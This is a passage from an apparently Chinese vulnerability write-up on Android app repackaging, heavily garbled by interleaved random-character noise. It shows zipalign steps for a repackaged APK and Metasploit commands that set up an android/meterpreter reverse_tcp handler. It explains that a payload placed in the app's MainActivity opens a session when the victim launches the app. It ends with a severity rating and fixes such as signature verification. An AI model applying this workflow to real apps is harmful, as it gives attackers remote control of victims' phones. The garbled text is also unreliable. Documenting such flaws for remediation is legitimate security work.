R" c! ]2 J5 ]- k: t 1 S9 |) A' V# U$ Y6 q3 j" q& b. K zipalign -v 4 repackaged.apk final.apk , n: K. H$ Q: w( ^9 Z) g) W- [+ `: B $ C8 `1 [2 u r- C1 y8 g

$ t5 |. D" D; v, I2 v$ U7 L 3 l" ]8 ]4 f3 l+ p. q2 k 检查是否对齐 $ p( P) }& j4 ]" h# N9 I6 p6 [# u- @ - I4 V! Y0 e6 S+ g: B; `/ I

* S+ K5 H, w0 X/ G7 I& l# z8 r9 |1 ~( q1 I& }0 D* N9 l zipalign -c -v 4 final.apk ! Z: V9 N. W# y 6 a% Q) ]8 ?* M: E, _( p0 w

9 x5 L5 ~( L3 S; `' o3 W5 _- o/ R! p6 G# e 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 / W8 S: S* N* s- m 9 D$ G, G' m# X0 l% a( c0 m

1 m1 x+ n% x3 ?7 i; r+ \: }, I. @: r' Y6 Q- e! R' W 启动Metasploit控制台，配置参数等待上线 " ]: P7 Q, L+ j! d( }1 ` - i" C6 v8 n$ n

- O1 r5 K' a1 @% V8 R" Y, m- F* m4 v+ j5 |' o' e% j 在终端依次输入如下命令 " @) J+ z2 y/ ~) ~- b - q2 Y. j: I% A- b

3 g: o9 q: S2 `8 v } M: s1 w 6 `: h5 y5 W+ E% b; x5 o5 s msfconsole $ w" U& K! Q# Y5 [$ h3 ` P) ~! {1 _5 Y% N) [3 s

. i# Z4 W; J* l& z) V; `* S7 V" y3 O- O# {. S$ m use exploit/multi/handler / ?. Y7 ~/ U- E- E " p$ j6 K. D( ?- L. o/ I" N& Y- q

0 h1 H9 z( H; [9 ^/ t+ J! V: P# X% |- i- C set PAYLOAD android/meterpreter/reverse_tcp + R$ h. Z8 | J% A7 v - T1 g* o& l( \/ r0 `% F

7 W, o6 q( A1 w4 E , I2 t! S3 v! U; z set LHOST 192.xxx.xx.xx 4 C2 G0 K, S2 z( p7 k+ K" a/ A 2 E( f) z' P; R! Q: e0 ?$ T

[7 ^! ]" c s- u0 N+ U. @; c 7 Q4 n( ^7 c# w+ N' z set LPORT 4444 ( R# @. S# [+ H& e3 c! \/ e7 D# _8 H+ s

- I0 C6 K2 P4 Z: d6 I' w7 W 8 z$ t" S) p4 n* D, Y1 A( L# m exploit ( \: V. Z/ ?# q9 j3 q4 G6 v" U h; ]) \) e2 }! A; ^

# @6 L( Z7 u# G4 G ( Z( X8 D+ l7 S: c2 t 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： / L/ U0 `7 V c1 m W/ @ ) O+ u. C9 @& c D6 |7 T. h

% g& N7 ^ B, f 2 U. i; x9 }% n" z; ^; b1 D" L6 x 漏洞危害：中 9 ]0 F$ l( v: D/ R3 W1 V5 b% j4 {: n/ B* {5 Z9 V4 V, V8 O

7 t7 p- u6 ]9 d8 H" t0 }/ y: F6 D1 }! s3 N0 L, {1 r8 m6 @' m8 K. a 2 t6 l' w3 N/ m+ Z$ w) p 3 L% \|) h% k% ^6 L0 M 严重程度 , T2 f5 {) \" q. a& _, T& q : R/ {/ k6 g4 w( O) @- S T, `/ {3 A( W' E ; ~: ?' w0 H- F: r& e3 z	+ \|5 t4 T" I; n# U. H - U) i$ {( \|1 c6 f8 `9 c* {" s6 b $ V9 I5 j5 Y, ?0 Q5 K7 f+ {# z& K9 B; ]' f* j 高 - z) \|6 \9 f/ ~2 \|1 \ % \" A1 {) P; y; p( s" R * e1 U+ ?: y* N; `% E1 n$ B# t2 z; j! U; I' h$ F# O	" n; d1 W: J& A1 Q% Z1 u . n5 [9 o) J" @% b) S - y7 j) j2 h0 D9 ^7 C) [: G & i' P1 S, s+ ]' Z5 y ■ - U- q% b; B$ [ , Q- c: b# @. Y: O5 x! k : d0 l" k( J1 W% o7 ]& n7 ~, } ! Y8 o3 T1 O( I ?, z2 I# o	: }# @9 W* u5 Z3 N( I4 J/ _- @. I: s- J0 e% S! I % [+ y: u9 g3 ?4 ^ $ e0 j: z7 T) }+ e+ W( r 中 % }" x* g% o2 r / D$ E; a; j* n7 i4 d: t: L 0 P. P' u; `, h! K8 ^$ E$ b+ Z ) M( Z, f1 d( Y0 O7 t; G( B3 X+ g# W4 ]	! \|4 n% F8 j7 u' I$ X( v" ?% ] + p2 d. B. X' f% w8 r7 D 3 s2 k% t% B# K3 f9 D* T4 h . Z1 ?) N3 B0 v K1 Z( h; r @: x9 M 8 I+ K Z! L. @$ Z) X) \ ! p0 ?) l) M7 [1 a; A% E5 f 5 s+ D( [2 o: x) \ + _0 K! y# q% u* n s9 I * W# G" t4 W, U# @( W7 b	5 P0 q7 ]1 w' f" ?1 \|4 Q& g* X3 q6 l* q8 b( l1 ^; Y) Z # c* c; z/ k J$ c0 y1 r/ s n9 _( @. ^4 ]' z7 [4 z- O 低 * d+ I5 b3 K' P) c: x m1 H , ~( H' V, @1 G4 g& ]: `$ } ) { n6 I& p% [; N. {. k6 v3 R' }1 S+ G+ M1 ]	/ d7 c4 ?6 m0 E( z! r2 y 7 [& n) M7 p* c+ j$ U: j: o7 t - d1 \| b0 Y% a' b: J6 D 7 M1 a2 w! j; B8 ~8 {( M ) n2 C+ u' M' O6 S ) I- e% Q4 N/ G* N( Z + R% `5 ~; E" L 5 e. N' P! b1 \|, N% J# ]& R; @3 m 8 F; h8 f2 E7 ] 1 I4 i5 y) @9 Z, A9 I" O

1 u0 }: j( V) k( Q- ? ' t6 P: |0 o S5 g! M) L 1 p z- N. ^# a % x* c3 c' T6 f# L

1 Q( h+ u! O8 { L3 h8 M' f" P& a7 f8 M 6 O( t9 e) y8 S3 H( _7 v! ?) M g5 ^ 修复方法： : V, J6 ~3 b2 b1 A $ ~& z2 C: J5 f9 a& ]6 }" A- S9 \

# P; v& n4 j6 C. P9 o, A7 @8 r6 R2 T 1.在 APP 启动时应做签名校验防止二次打包。
) W& ~: z0 C( t* D' }" s4 P : l8 v$ m3 ?, {5 v3 U* D 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 # x2 Q9 s& p; N9 n " C- g. f/ W( e8 C- l

9 L& t, P1 K$ ^1 @4 w) l/ \( P' }9 G/ h7 e5 t( \+ f - K% l; [; H2 O* h# G: u* ?( p 4 b: Y: b' v8 W% L" f

+ q0 U; V" D5 v1 @ z6 T0 w6 U' F1 Z o9 B# P# P* u4 H1 P( c C1 S" ?
4 ^4 ~( x. u7 B9 Z( Q& h) F/ d$ E0 {+ J7 d$ k9 N

		自动登录	找回密码
密码			立即注册